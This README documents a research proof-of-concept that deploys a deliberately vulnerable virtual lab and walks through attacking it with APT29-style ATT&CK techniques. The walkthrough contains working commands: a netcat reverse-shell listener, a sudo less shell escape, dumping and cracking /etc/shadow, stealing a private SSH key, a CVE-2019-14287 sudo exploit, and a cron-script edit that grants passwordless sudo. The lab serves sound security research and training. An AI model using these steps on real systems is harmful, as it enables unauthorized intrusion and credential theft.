# URSID: Using formalism to Refine attack Scenarios for vulnerable Infrastructure Deployment

## Description
This repository contains a proof of concept for an ongoing research on how to deploy vulnerable architectures based on a formalized attack scenario description.
Users may deploy a simple virtual vulnerable architecture and attack it, using a modus operandi inspired by threat actor APT 29.


The configuration file for this deployment has been generated beforehand by refining a scenario described on a MITRE ATT&CK technical level to a procedural level. This process is described in the associated paper, and code relevant to it may be added to this repository in the future.

![Technical scenario](./doc/images/scenario_with_tau.png)


## Requirements:
- Ansible 2.12 or later
- Python 3.10.2 or later
- Vagrant 2.2.19 or later
- VirtualBox v6.1.32 or later

- pip
  - jsonschema
  - argparse

## Installation

The following instructions have been tested on Ubuntu 20.04. They might work on other UNIX based operating systems but are under no guarantee to do so.


### Automated installation
This script will install ansible, python, vagrant and virtualbox.
```bash
sudo ./install.sh
```

#### Manual installation

- You may download Ansible from [here](https://docs.ansible.com/ansible/latest/installation_guide/intro_installation.html).
- You may download Python from [here](https://www.python.org/downloads/).
- You may download Vagrant from [here](https://www.vagrantup.com/downloads).
- You may download VirtualBox from [here](https://www.virtualbox.org/wiki/Downloads).

### Install required python packages
```bash
pip install -r requirements.txt
```

## Deployment
- Convert the given configuration file to vagrant and ansible files:
```bash
cd src
python3 main.py ../scenarios/poc/scenario.json
```
- Launch the VMs (this may take a few minutes to complete):
```bash
cd output && vagrant up
```

## Attacking the resulting architecture
### Machine Bear
#### T1566: Phishing
- Open a ncat connection on port 8888.
```bash
nc -nlvp 8888
```

- In an other terminal (opened in output directory), remotely detonate the payload on machine bear using the provided script.
```bash
./bear_alice.sh
```

- Your previous terminal should now have access to a session as user Alice on machine Bear. It contains a sample document (important_business.pdf) and the payload used for access.
#### T1548: Abuse Elevation Control Mechanism
- Check sudo permissions using
```bash
sudo -l
```
- You can see that user Alice may run the command less with sudo privileges. This can be used to gain access to a root shell.
```bash
sudo /bin/less /etc/profile 
!/bin/sh
```

#### T1003: OS Credential Dumping.
- As a root user, you may now check for passwords stored on the system.
```bash
cat /etc/passwd 
cat /etc/shadow
```
- These reveal 4 users on the machine: Alice, Bob, Charlie, and SuperUser. 
- /etc/shadow gave us their hash. We can attempt to crack them using [john](https://www.openwall.com/john/) (or the cracking tool of your choice).
- Cracking these files (using for instance [rockyou.txt](https://github.com/praetorian-inc/Hob0Rules/blob/master/wordlists/rockyou.txt.gz) as a wordlist) reveals the passwords *rainbow* for Bob and *november* for Charlie.

#### T1552: Unsecured Credentials 
- Logging as Charlie or Bob doesn't reveal much. However, user SuperUser appears to have interesting data to reuse, giving us access to a private key.
```bash
sudo su superuser
ls -al
cd .ssh
cat id_rsa_new
```


### Machine Badger
#### T1021: Remote Services
- We can find out which other machines exist on the network using nmap.
``` bash
sudo apt update
sudo apt-get install nmap
nmap -sP 192.168.56.0/24
```

- Get information about machine 192.168.56.3 . We see it accepts passwords for ssh connections.
```bash
nmap --script ssh-auth-methods 192.168.56.3
```

- Let's try some of the username/passwords combinations we previously found (User: bob, Password: *rainbow*).
```bash
ssh bob@192.168.56.3
```

- We are now logged in as bob!

#### T1068: Exploitation for privilege escalation

- Check for the sudo version.

```bash
sudo -V
```

- This reveals that an old sudo package (1.8.2) is installed. A quick search reveals that this particular version may be vulnerable to [CVE-2019-14287](https://nvd.nist.gov/vuln/detail/CVE-2019-14287).
- Sure enough, checking sudoer privileges shows that user bob may run /bin/bash as any user except root, which is how the vulnerability may be exploited.
```bash
sudo -l
```

- Exploit the vulnerability to run /bin/bash as root.
```bash
sudo -u#-1 /bin/bash 
```

#### T1552: Unsecured Credentials

- Access SuperUser home directory and recover the bash_history there. It contains information about a secret named skunk_superuser_password.
```bash
cd /home/superuser
cat .bash_history
```

### Machine Badger 

#### T1021: Remote Services
Note: attacking this machine is not needed to access the winning position Skunk, SuperUser.
- Using the same method as machine Raccoon, we can log in as user Charlie (with password *november*).
```bash
nmap --script ssh-auth-methods 192.168.56.4
ssh charlie@192.168.56.4
```

#### T1548: Abuse Elevation Control Mechanism

- There is no secret to recover on this machine. We can still get root access using the same method as machine Bear.
```bash
sudo /bin/less /etc/profile 
!/bin/sh
```

### Machine Skunk
#### T1021: Remote Services
- Using the previous nmap script on 192.168.56.5 reveals that this machine does not accept password connections. But we still have a ssh key we found in (Bear, Superuser) that we haven't used.
- Go back to that position, then access machine skunk using that key.
```bash
cd .ssh
nmap --script ssh-auth-methods 192.168.56.5
ssh diana@192.168.56.5 -i id_rsa_new
```
- From this position, there is 2 ways to become SuperUser.
#### T1078: Valid Accounts
- We can just reuse the password we found in Raccoon, SuperUser
```bash
sudo su superuser
```

#### T1053: Scheduled Task/Job
- Going back as user Diana, we see a scan.sh file, which turns out to be linked to a cronjob.
```bash
ls 
cat /etc/crontab
```
- Since this crontab runs as root and we have write access to scan.sh, we can modify its content to give us a shell whenever the crontab is launched.
- We use echo here because nano/vim behave a bit weird when accessed through our python payload shell. This can be worked around by accessing the shell directly via ssh through a peristence technique (such as adding your own key pair manually).
```bash
echo 'echo "diana ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> scan.sh
```
- After a minute, we can see that diana now has sudoer access on anything, and can become SuperUser.
```bash
sudo -l
sudo su superuser
```


## Known issues (last updated: 13/01/2023)
- The privilege exploitation in racoon somehow gives a shell with root groupid but not root userid.
  - Can be worked around by adding any command rather than just /bin/bash to the sudoers file.
- The python shell is a bit annoying to work with (no auto tab completion).
  - Tests with other payloads may be done. Also possible to add a persistence technique to the scenario.
- Some of the techniques would be hard to implement without knowing the scenario in the first place (such as using the ssh key to connect as diana).
  - A bit more clues (such as a signature in the private key) will be added.


## Authors
Authors, acknowledgments and contact info have been omitted as part of the anonymous submission process related to the ASIACCS 2023 conference, and may be added in the future.

## Project status and future works
This project is still under development. Planned upgrades include:
- Cleaning up the code, including adding an online documentation.
- Adding the procedural refinement process relevant code, including examples of procedures for a sample of MITRE ATT&CK techniques.
